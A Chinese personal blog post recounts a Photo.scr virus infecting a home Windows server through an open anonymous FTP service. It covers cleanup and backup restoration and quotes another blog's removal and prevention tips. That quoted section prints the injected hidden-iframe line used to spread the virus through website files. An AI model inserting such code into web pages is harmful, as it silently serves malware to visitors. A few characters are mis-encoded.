最近盤內(nèi)出現(xiàn)了大量Photo.scr、AV.scr等文件，本以為是Emby更新后導(dǎo)致的，沒想到居然是病毒入侵，而且已經(jīng)發(fā)現(xiàn)了一些影視劇名字被篡改，加了前綴的那種。由此可見，家庭房服務(wù)器還是要特別注意安全問(wèn)題的。

網(wǎng)上說(shuō)這種病毒是通過(guò)FTP服務(wù)漏洞出現(xiàn)的，需要關(guān)閉匿名訪問(wèn)才行。好在今存在于Windows系統(tǒng)作服務(wù)器的時(shí)候才能用，所以Windows一般不要用來(lái)當(dāng)服務(wù)器。

我這邊為了測(cè)試WiFi6的局域網(wǎng)速度，Samba速度很慢，所以用FTP進(jìn)行測(cè)試，經(jīng)過(guò)測(cè)驗(yàn)發(fā)現(xiàn)FTP可以滿速，但是測(cè)完忘了關(guān)閉，結(jié)果被病毒入侵。在早先我發(fā)威聯(lián)通教程時(shí)也說(shuō)過(guò)，經(jīng)?？吹饺罩局杏腥瞬粩鄧L試破解你的密碼，網(wǎng)絡(luò)環(huán)境比你想的要糟糕很多。雖然我個(gè)人沒這種低俗興趣，但好像有不少人都喜歡玩這套東西，只能說(shuō)注意一下。

我這邊解決方法是采用火絨查殺，但肯定不徹底，因?yàn)槲乙呀?jīng)發(fā)現(xiàn)有篡改我圖片和命名的舉動(dòng)了，在小地方寫個(gè)文件，或者弄個(gè)后臺(tái)也是容易的事情。

一般遇到這種情況，NAS里按理說(shuō)所有文件就應(yīng)該利用快照功能恢復(fù)到幾個(gè)月以前的版本了，不過(guò)看這種病毒很通用，暫時(shí)沒發(fā)現(xiàn)什么破壞，先不回滾了。但是Windows系統(tǒng)必須重新安裝了。

這個(gè)時(shí)候如果有還原點(diǎn)，或者是有原來(lái)的Windows系統(tǒng)的ghost就好了，不過(guò)我這邊有群暉的ABB套件，做過(guò)備份，因此只要直接還原就行了。

最后貼一段網(wǎng)上博客的原文：

Photo.scr病毒是怎么被上傳的？Photo.scr病毒怎么清除和防范？

有段時(shí)間筆者的win2003服務(wù)器上出現(xiàn)大量Photo.scr病毒，慶幸的是檢查任務(wù)管理器后并沒有發(fā)現(xiàn)可疑進(jìn)程，說(shuō)明病毒沒有被執(zhí)行。

刪除后沒清靜多少時(shí)間，這些病毒又冒出來(lái)了。

這些Photo.scr的路徑都在IIS自帶FTP的路徑下，關(guān)閉FTP服務(wù)就不再出現(xiàn)了，只要一開FTP過(guò)段時(shí)間又會(huì)出現(xiàn)。

然后就認(rèn)為黑客是利用了IIS自帶的FTP漏洞上傳的病毒文件，只要不用FTP時(shí)就關(guān)掉FTP服務(wù)。

剛剛發(fā)現(xiàn)原來(lái)是開了FTP的匿名連接導(dǎo)致的，只要取消“允許匿名連接”的勾就解決了。

這段時(shí)間筆者在給網(wǎng)站搬家時(shí)，發(fā)現(xiàn)Defender對(duì)網(wǎng)站文件進(jìn)行報(bào)毒，查看后是被加入了以下惡意代碼，以達(dá)到病毒傳播的目的。
<iframe src=Photo.scr width=1 height=1 frameborder=0></iframe>

黑客并沒有批量添加代碼，只改了2個(gè)文件，而且不僅限是html文件，還有xml文件也沒幸免，應(yīng)該是黑客覺得批量添加容易被發(fā)現(xiàn)，所以手動(dòng)添加。

清除Photo.scr病毒：
1、如果沒有運(yùn)行它，直接搜索Photo.scr并刪除就可以了，如果已經(jīng)運(yùn)行過(guò)，建議殺毒或重裝系統(tǒng)。
2、檢查下文件有沒有被添加惡意代碼，雖然已經(jīng)刪除Photo.scr不會(huì)再傳播，但是安全軟件還是會(huì)報(bào)毒提示，如果被添加惡意代碼刪除即可。

安全防范建議：
1、雖然知道了是開了FTP的匿名連接導(dǎo)致病毒上傳，不過(guò)還是建議不用FTP的時(shí)候還是關(guān)閉它，誰(shuí)知道它還會(huì)有其它的什么漏洞呢。
2、建議FTP的目錄不要直接設(shè)在網(wǎng)站目錄，如需上傳文件到網(wǎng)站目錄，可以先上傳到別處再通過(guò)復(fù)制或剪切到網(wǎng)站目錄。
3、更改FTP默認(rèn)端口，避免被黑客的端口掃描器掃到。